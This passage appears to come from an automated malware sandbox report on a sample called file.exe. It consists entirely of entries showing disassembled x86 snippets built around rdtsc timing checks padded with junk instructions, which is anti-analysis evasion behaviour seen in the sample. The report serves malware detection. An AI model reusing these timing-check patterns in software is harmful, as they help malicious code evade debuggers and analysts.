              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79B7C second address: D79B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79B80 second address: D79BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FAC2CCCA0DCh 0x0000000c pop edi 0x0000000d jmp 00007FAC2CCCA0DDh 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FAC2CCCA0DFh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79D00 second address: D79D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79D06 second address: D79D0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79E96 second address: D79E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D79E9C second address: D79EA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7A169 second address: D7A182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2C5039B3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E991 second address: D7E996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EAC5 second address: D7EAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2C5039AAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EAD3 second address: D7EADD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAC2CCCA0D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EADD second address: D7EAE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EAE2 second address: D7EAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAC2CCCA0D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EAF6 second address: D7EB2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007FAC2C5039AEh 0x00000011 jnc 00007FAC2C5039ACh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EC7E second address: D7EC8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FAC2CCCA0D6h 0x0000000a jp 00007FAC2CCCA0D6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EC8E second address: D7ECC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B6h 0x00000007 jnl 00007FAC2C5039A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FAC2C5039ADh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7ECC2 second address: D7ECFA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FAC2CCCA0E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FAC2CCCA0E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jbe 00007FAC2CCCA0D6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7ECFA second address: D7ED00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EE5B second address: D7EE65 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAC2CCCA0D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EE65 second address: D7EE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FAC2C5039A8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FAC2C5039B3h 0x00000015 jmp 00007FAC2C5039AEh 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EE9A second address: D7EEB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAC2CCCA0DFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FAC2CCCA0D6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EEB7 second address: D7EEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EFDE second address: D7F003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2CCCA0E4h 0x00000009 popad 0x0000000a jl 00007FAC2CCCA0DCh 0x00000010 jne 00007FAC2CCCA0D6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D272E3 second address: D272FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAC2C5039B4h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D272FF second address: D273B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop ebx 0x00000010 jmp 00007FAC2CCCA0E5h 0x00000015 popad 0x00000016 nop 0x00000017 xor dword ptr [ebp+122D33E0h], eax 0x0000001d mov ebx, dword ptr [ebp+1247D1EAh] 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007FAC2CCCA0D8h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d jl 00007FAC2CCCA0DCh 0x00000043 mov ecx, dword ptr [ebp+122D2AA8h] 0x00000049 add eax, ebx 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e call 00007FAC2CCCA0D8h 0x00000053 pop eax 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 add dword ptr [esp+04h], 0000001Ch 0x00000060 inc eax 0x00000061 push eax 0x00000062 ret 0x00000063 pop eax 0x00000064 ret 0x00000065 mov edx, eax 0x00000067 jnc 00007FAC2CCCA0DCh 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FAC2CCCA0E6h 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F18D second address: D7F191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F191 second address: D7F1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2CCCA0E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F30C second address: D7F311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F311 second address: D7F376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FAC2CCCA0E9h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FAC2CCCA0E2h 0x00000016 popad 0x00000017 push ecx 0x00000018 jmp 00007FAC2CCCA0E3h 0x0000001d jmp 00007FAC2CCCA0E8h 0x00000022 pop ecx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F376 second address: D7F396 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jg 00007FAC2C5039A6h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FAC2C5039A6h 0x00000014 jmp 00007FAC2C5039ACh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F396 second address: D7F39C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83AA3 second address: D83AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83AA7 second address: D83AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FAC2CCCA0D6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86157 second address: D8615B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8615B second address: D86167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAC2CCCA0D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86167 second address: D8616F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8616F second address: D861B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FAC2CCCA0E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FAC2CCCA0DBh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 push edx 0x00000017 pop edx 0x00000018 pop edi 0x00000019 jmp 00007FAC2CCCA0DDh 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007FAC2CCCA0D6h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D804 second address: D8D83A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAC2C5039B8h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D83A second address: D8D83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BB8F second address: D8BBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAC2C5039A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BBA0 second address: D8BBD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E7h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push edi 0x00000016 pop edi 0x00000017 ja 00007FAC2CCCA0D6h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8BBD0 second address: D8BBD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CFC0 second address: D8CFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007FAC2CCCA0D6h 0x0000000c popad 0x0000000d jmp 00007FAC2CCCA0DAh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D27F second address: D8D289 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAC2C5039A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D289 second address: D8D295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007FAC2CCCA0D6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8D295 second address: D8D2C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039ADh 0x00000007 ja 00007FAC2C5039A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FAC2C5039B2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9239B second address: D923B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D923B5 second address: D923BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D923BF second address: D923F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAC2CCCA0E5h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FAC2CCCA0E5h 0x00000014 jmp 00007FAC2CCCA0DFh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D923F2 second address: D923F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D923F8 second address: D923FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D923FE second address: D92434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAC2C5039B9h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9147B second address: D91481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91481 second address: D91489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91489 second address: D914AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FAC2CCCA0D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAC2CCCA0E3h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91A05 second address: D91A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2C5039B4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91A1D second address: D91A23 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91A23 second address: D91A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jc 00007FAC2C5039B4h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91D5D second address: D91D76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAC2CCCA0E4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91D76 second address: D91D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAC2C5039A6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91D86 second address: D91D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9204B second address: D92057 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAC2C5039AEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92057 second address: D92066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FAC2CCCA0D6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92066 second address: D9207E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAC2C5039A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FAC2C5039A6h 0x00000012 jc 00007FAC2C5039A6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9207E second address: D920C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FAC2CCCA0ECh 0x0000000c pushad 0x0000000d ja 00007FAC2CCCA0D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jmp 00007FAC2CCCA0E8h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96E6C second address: D96E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E4E4 second address: D9E50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007FAC2CCCA0E7h 0x0000000c jng 00007FAC2CCCA0D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9EAC4 second address: D9EAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA0C second address: D9FA26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9FA26 second address: D9FA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E0A0 second address: D9E0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED173 second address: CED1AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FAC2C5039B8h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED1AB second address: CED1C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6FE1 second address: DA6FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA6FE7 second address: DA6FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7174 second address: DA7179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7179 second address: DA7186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FAC2CCCA0D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7186 second address: DA718C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB203F second address: DB204B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FAC2CCCA0D6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB204B second address: DB2067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jne 00007FAC2C5039A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB2067 second address: DB207C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAC2CCCA0D6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d jnl 00007FAC2CCCA0D8h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB207C second address: DB2090 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAC2C5039AAh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FAC2C5039A6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3733 second address: DB3781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007FAC2CCCA0E6h 0x0000000c jmp 00007FAC2CCCA0DFh 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jl 00007FAC2CCCA0D6h 0x0000001d jmp 00007FAC2CCCA0DCh 0x00000022 je 00007FAC2CCCA0D6h 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3781 second address: DB3794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAC2C5039A6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnc 00007FAC2C5039A6h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3794 second address: DB37A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAC2CCCA0D6h 0x0000000a jg 00007FAC2CCCA0D6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB37A4 second address: DB37AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB57C9 second address: DB57DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB57DF second address: DB57E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5390 second address: DB53AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jbe 00007FAC2CCCA0D6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop esi 0x00000013 rdtsc
